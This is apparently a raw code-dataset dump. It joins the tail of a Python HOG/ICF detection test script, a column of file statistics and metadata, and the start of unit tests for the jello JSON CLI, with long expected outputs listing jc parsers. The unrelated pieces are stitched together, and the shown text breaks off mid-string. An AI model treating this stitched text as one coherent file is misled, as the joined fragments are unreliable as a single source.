# cv2.imwrite(icf_result_dir + "/sample_2_" + str(sample) + ".jpg", img_icf)
#
# # Check detections
# detections, truePositive = checker.checkDetections(imgPath, windowsIcf)
# c = Counter(detections)
# truePositives = c[True]
# falsePositives = c[False]
# falseNegative = 0 if truePositive else 1
# resultsIcf.write(imgPath + " tp=" + str(truePositives) + " fp=" + str(falsePositives) + " fn=" + str(falseNegative) + "\n")
sample += 1
# resultsHog.close()
# resultsIcf.close()
# test_multiscale("hog/svm.dump",
# "icf_new_5000_2000_1k.dump",
# "./hog_result_all_flow",
# "./icf_result_all_flow",
# 100)
checker = detection_checker.Checker("annotations.txt")
test_multiscale_checker("hog/svm.dump",
"icf_classifiers/icf_new_5000f_2000e.dump",
"./hog_result_dir",
"./icf_5000_2000",
checker,
"results_hog_")
| 38.367188
| 141
| 0.624007
| 1,253
| 9,822
| 4.626496
| 0.132482
| 0.075901
| 0.131102
| 0.186303
| 0.778334
| 0.769018
| 0.769018
| 0.746248
| 0.730723
| 0.730723
| 0
| 0.069509
| 0.250051
| 9,822
| 255
| 142
| 38.517647
| 0.717486
| 0.139788
| 0
| 0.662857
| 0
| 0
| 0.252526
| 0.233028
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057143
| null | null | 0.011429
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
336e3e082850e3f0276fc3283c09a37bb14bc4e0
| 153,541
|
py
|
Python
|
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import os
import sys
import io
import contextlib
import unittest
from unittest.mock import patch
import jello.cli
from jello.lib import opts
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
def setUp(self):
# initialize options
opts.initialize = None
opts.version_info = None
opts.helpme = None
opts.compact = None
opts.nulls = None
opts.raw = None
opts.lines = None
opts.mono = None
opts.schema = None
opts.types = None
opts.keyname_color = None
opts.keyword_color = None
opts.number_color = None
opts.string_color = None
self.jc_a_output = '''{"name": "jc", "version": "1.9.3", "description": "jc cli output JSON conversion tool", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "parser_count": 50, "parsers": [{"name": "airport", "argument": "--airport", "version": "1.0", "description": "airport -I command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["darwin"], "magic_commands": ["airport -I"]}, {"name": "airport_s", "argument": "--airport-s", "version": "1.0", "description": "airport -s command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["darwin"], "magic_commands": ["airport -s"]}, {"name": "arp", "argument": "--arp", "version": "1.2", "description": "arp command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["arp"]}, {"name": "blkid", "argument": "--blkid", "version": "1.0", "description": "blkid command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["blkid"]}, {"name": "crontab", "argument": "--crontab", "version": "1.1", "description": "crontab command and file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["crontab"]}, {"name": "crontab_u", "argument": "--crontab-u", "version": "1.0", "description": "crontab file parser with user support", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "csv", "argument": "--csv", "version": "1.0", "description": "CSV file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the python standard csv library", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "df", "argument": "--df", "version": "1.1", "description": "df command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["df"]}, {"name": "dig", "argument": "--dig", "version": "1.1", "description": "dig command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["dig"]}, {"name": "du", "argument": "--du", "version": "1.1", "description": "du command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["du"]}, {"name": "env", "argument": "--env", "version": "1.1", "description": "env command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["env"]}, {"name": "file", "argument": "--file", "version": "1.1", "description": "file command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["file"]}, {"name": "free", "argument": "--free", "version": "1.0", "description": "free command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["free"]}, {"name": "fstab", "argument": "--fstab", "version": "1.0", "description": "fstab file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"]}, {"name": "group", "argument": "--group", "version": "1.0", "description": "/etc/group file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "gshadow", "argument": "--gshadow", "version": "1.0", "description": "/etc/gshadow file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd"]}, {"name": "history", "argument": "--history", "version": "1.2", "description": "history command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Optimizations by https://github.com/philippeitis", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"]}, {"name": "hosts", "argument": "--hosts", "version": "1.0", "description": "/etc/hosts file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "id", "argument": "--id", "version": "1.0", "description": "id command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["id"]}, {"name": "ifconfig", "argument": "--ifconfig", "version": "1.5", "description": "ifconfig command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["ifconfig"]}, {"name": "ini", "argument": "--ini", "version": "1.0", "description": "INI file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using configparser from the standard library", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "iptables", "argument": "--iptables", "version": "1.1", "description": "iptables command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["iptables"]}, {"name": "jobs", "argument": "--jobs", "version": "1.0", "description": "jobs command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["jobs"]}, {"name": "last", "argument": "--last", "version": "1.0", "description": "last and lastb command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["last", "lastb"]}, {"name": "ls", "argument": "--ls", "version": "1.3", "description": "ls command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["ls"]}, {"name": "lsblk", "argument": "--lsblk", "version": "1.3", "description": "lsblk command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsblk"]}, {"name": "lsmod", "argument": "--lsmod", "version": "1.1", "description": "lsmod command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsmod"]}, {"name": "lsof", "argument": "--lsof", "version": "1.0", "description": "lsof command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsof"]}, {"name": "mount", "argument": "--mount", "version": "1.1", "description": "mount command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["mount"]}, {"name": "netstat", "argument": "--netstat", "version": "1.2", "description": "netstat command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["netstat"]}, {"name": "ntpq", "argument": "--ntpq", "version": "1.0", "description": "ntpq -p command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["ntpq"]}, {"name": "passwd", "argument": "--passwd", "version": "1.0", "description": "/etc/passwd file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "pip_list", "argument": "--pip-list", "version": "1.0", "description": "pip list command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["pip list", "pip3 list"]}, {"name": "pip_show", "argument": "--pip-show", "version": "1.0", "description": "pip show command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["pip show", "pip3 show"]}, {"name": "ps", "argument": "--ps", "version": "1.1", "description": "ps command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["ps"]}, {"name": "route", "argument": "--route", "version": "1.0", "description": "route command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["route"]}, {"name": "shadow", "argument": "--shadow", "version": "1.0", "description": "/etc/shadow file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "ss", "argument": "--ss", "version": "1.0", "description": "ss command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["ss"]}, {"name": "stat", "argument": "--stat", "version": "1.0", "description": "stat command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["stat"]}, {"name": "systemctl", "argument": "--systemctl", "version": "1.0", "description": "systemctl command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl"]}, {"name": "systemctl_lj", "argument": "--systemctl-lj", "version": "1.0", "description": "systemctl list-jobs command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-jobs"]}, {"name": "systemctl_ls", "argument": "--systemctl-ls", "version": "1.0", "description": "systemctl list-sockets command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-sockets"]}, {"name": "systemctl_luf", "argument": "--systemctl-luf", "version": "1.0", "description": "systemctl list-unit-files command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-unit-files"]}, {"name": "timedatectl", "argument": "--timedatectl", "version": "1.0", "description": "timedatectl status command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["timedatectl", "timedatectl status"]}, {"name": "uname", "argument": "--uname", "version": "1.1", "description": "uname -a command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["uname"]}, {"name": "uptime", "argument": "--uptime", "version": "1.0", "description": "uptime command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["uptime"]}, {"name": "w", "argument": "--w", "version": "1.0", "description": "w command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["w"]}, {"name": "who", "argument": "--who", "version": "1.0", "description": "who command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["who"]}, {"name": "xml", "argument": "--xml", "version": "1.0", "description": "XML file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the xmltodict library at https://github.com/martinblech/xmltodict", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "yaml", "argument": "--yaml", "version": "1.0", "description": "YAML file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}]}'''
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitterdata.jlines'), 'r', encoding='utf-8') as f:
self.twitterdata = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitterdata.json'), 'r', encoding='utf-8') as f:
self.twitterdata_output = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitter-table-output.jlines'), 'r', encoding='utf-8') as f:
self.twitter_table_output = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitter-table-output.schema'), 'r', encoding='utf-8') as f:
self.twitter_table_output_schema = f.read()
def test_jc_a(self):
"""
Test jc -a | jello
"""
self.expected = '''\
{
"name": "jc",
"version": "1.9.3",
"description": "jc cli output JSON conversion tool",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"parser_count": 50,
"parsers": [
{
"name": "airport",
"argument": "--airport",
"version": "1.0",
"description": "airport -I command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -I"
]
},
{
"name": "airport_s",
"argument": "--airport-s",
"version": "1.0",
"description": "airport -s command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -s"
]
},
{
"name": "arp",
"argument": "--arp",
"version": "1.2",
"description": "arp command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"arp"
]
},
{
"name": "blkid",
"argument": "--blkid",
"version": "1.0",
"description": "blkid command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"blkid"
]
},
{
"name": "crontab",
"argument": "--crontab",
"version": "1.1",
"description": "crontab command and file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"crontab"
]
},
{
"name": "crontab_u",
"argument": "--crontab-u",
"version": "1.0",
"description": "crontab file parser with user support",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "csv",
"argument": "--csv",
"version": "1.0",
"description": "CSV file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the python standard csv library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "df",
"argument": "--df",
"version": "1.1",
"description": "df command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"df"
]
},
{
"name": "dig",
"argument": "--dig",
"version": "1.1",
"description": "dig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"dig"
]
},
{
"name": "du",
"argument": "--du",
"version": "1.1",
"description": "du command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"du"
]
},
{
"name": "env",
"argument": "--env",
"version": "1.1",
"description": "env command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"env"
]
},
{
"name": "file",
"argument": "--file",
"version": "1.1",
"description": "file command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"file"
]
},
{
"name": "free",
"argument": "--free",
"version": "1.0",
"description": "free command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"free"
]
},
{
"name": "fstab",
"argument": "--fstab",
"version": "1.0",
"description": "fstab file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
]
},
{
"name": "group",
"argument": "--group",
"version": "1.0",
"description": "/etc/group file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "gshadow",
"argument": "--gshadow",
"version": "1.0",
"description": "/etc/gshadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd"
]
},
{
"name": "history",
"argument": "--history",
"version": "1.2",
"description": "history command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Optimizations by https://github.com/philippeitis",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
]
},
{
"name": "hosts",
"argument": "--hosts",
"version": "1.0",
"description": "/etc/hosts file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
},
{
"name": "ifconfig",
"argument": "--ifconfig",
"version": "1.5",
"description": "ifconfig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"ifconfig"
]
},
{
"name": "ini",
"argument": "--ini",
"version": "1.0",
"description": "INI file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using configparser from the standard library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "iptables",
"argument": "--iptables",
"version": "1.1",
"description": "iptables command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"iptables"
]
},
{
"name": "jobs",
"argument": "--jobs",
"version": "1.0",
"description": "jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"jobs"
]
},
{
"name": "last",
"argument": "--last",
"version": "1.0",
"description": "last and lastb command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"last",
"lastb"
]
},
{
"name": "ls",
"argument": "--ls",
"version": "1.3",
"description": "ls command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ls"
]
},
{
"name": "lsblk",
"argument": "--lsblk",
"version": "1.3",
"description": "lsblk command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsblk"
]
},
{
"name": "lsmod",
"argument": "--lsmod",
"version": "1.1",
"description": "lsmod command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsmod"
]
},
{
"name": "lsof",
"argument": "--lsof",
"version": "1.0",
"description": "lsof command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsof"
]
},
{
"name": "mount",
"argument": "--mount",
"version": "1.1",
"description": "mount command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"mount"
]
},
{
"name": "netstat",
"argument": "--netstat",
"version": "1.2",
"description": "netstat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"netstat"
]
},
{
"name": "ntpq",
"argument": "--ntpq",
"version": "1.0",
"description": "ntpq -p command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ntpq"
]
},
{
"name": "passwd",
"argument": "--passwd",
"version": "1.0",
"description": "/etc/passwd file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "pip_list",
"argument": "--pip-list",
"version": "1.0",
"description": "pip list command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip list",
"pip3 list"
]
},
{
"name": "pip_show",
"argument": "--pip-show",
"version": "1.0",
"description": "pip show command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip show",
"pip3 show"
]
},
{
"name": "ps",
"argument": "--ps",
"version": "1.1",
"description": "ps command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ps"
]
},
{
"name": "route",
"argument": "--route",
"version": "1.0",
"description": "route command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"route"
]
},
{
"name": "shadow",
"argument": "--shadow",
"version": "1.0",
"description": "/etc/shadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "ss",
"argument": "--ss",
"version": "1.0",
"description": "ss command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ss"
]
},
{
"name": "stat",
"argument": "--stat",
"version": "1.0",
"description": "stat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"stat"
]
},
{
"name": "systemctl",
"argument": "--systemctl",
"version": "1.0",
"description": "systemctl command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl"
]
},
{
"name": "systemctl_lj",
"argument": "--systemctl-lj",
"version": "1.0",
"description": "systemctl list-jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-jobs"
]
},
{
"name": "systemctl_ls",
"argument": "--systemctl-ls",
"version": "1.0",
"description": "systemctl list-sockets command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-sockets"
]
},
{
"name": "systemctl_luf",
"argument": "--systemctl-luf",
"version": "1.0",
"description": "systemctl list-unit-files command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-unit-files"
]
},
{
"name": "timedatectl",
"argument": "--timedatectl",
"version": "1.0",
"description": "timedatectl status command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"timedatectl",
"timedatectl status"
]
},
{
"name": "uname",
"argument": "--uname",
"version": "1.1",
"description": "uname -a command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"uname"
]
},
{
"name": "uptime",
"argument": "--uptime",
"version": "1.0",
"description": "uptime command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"uptime"
]
},
{
"name": "w",
"argument": "--w",
"version": "1.0",
"description": "w command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"w"
]
},
{
"name": "who",
"argument": "--who",
"version": "1.0",
"description": "who command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"who"
]
},
{
"name": "xml",
"argument": "--xml",
"version": "1.0",
"description": "XML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the xmltodict library at https://github.com/martinblech/xmltodict",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "yaml",
"argument": "--yaml",
"version": "1.0",
"description": "YAML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
}
]
}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s(self):
"""
Test jc -a | jello -s
"""
self.expected = '''\
.name = "jc";
.version = "1.9.3";
.description = "jc cli output JSON conversion tool";
.author = "Kelly Brazil";
.author_email = "kellyjonbrazil@gmail.com";
.parser_count = 50;
.parsers[0].name = "airport";
.parsers[0].argument = "--airport";
.parsers[0].version = "1.0";
.parsers[0].description = "airport -I command parser";
.parsers[0].author = "Kelly Brazil";
.parsers[0].author_email = "kellyjonbrazil@gmail.com";
.parsers[0].compatible[0] = "darwin";
.parsers[0].magic_commands[0] = "airport -I";
.parsers[1].name = "airport_s";
.parsers[1].argument = "--airport-s";
.parsers[1].version = "1.0";
.parsers[1].description = "airport -s command parser";
.parsers[1].author = "Kelly Brazil";
.parsers[1].author_email = "kellyjonbrazil@gmail.com";
.parsers[1].compatible[0] = "darwin";
.parsers[1].magic_commands[0] = "airport -s";
.parsers[2].name = "arp";
.parsers[2].argument = "--arp";
.parsers[2].version = "1.2";
.parsers[2].description = "arp command parser";
.parsers[2].author = "Kelly Brazil";
.parsers[2].author_email = "kellyjonbrazil@gmail.com";
.parsers[2].compatible[0] = "linux";
.parsers[2].compatible[1] = "aix";
.parsers[2].compatible[2] = "freebsd";
.parsers[2].compatible[3] = "darwin";
.parsers[2].magic_commands[0] = "arp";
.parsers[3].name = "blkid";
.parsers[3].argument = "--blkid";
.parsers[3].version = "1.0";
.parsers[3].description = "blkid command parser";
.parsers[3].author = "Kelly Brazil";
.parsers[3].author_email = "kellyjonbrazil@gmail.com";
.parsers[3].compatible[0] = "linux";
.parsers[3].magic_commands[0] = "blkid";
.parsers[4].name = "crontab";
.parsers[4].argument = "--crontab";
.parsers[4].version = "1.1";
.parsers[4].description = "crontab command and file parser";
.parsers[4].author = "Kelly Brazil";
.parsers[4].author_email = "kellyjonbrazil@gmail.com";
.parsers[4].compatible[0] = "linux";
.parsers[4].compatible[1] = "darwin";
.parsers[4].compatible[2] = "aix";
.parsers[4].compatible[3] = "freebsd";
.parsers[4].magic_commands[0] = "crontab";
.parsers[5].name = "crontab_u";
.parsers[5].argument = "--crontab-u";
.parsers[5].version = "1.0";
.parsers[5].description = "crontab file parser with user support";
.parsers[5].author = "Kelly Brazil";
.parsers[5].author_email = "kellyjonbrazil@gmail.com";
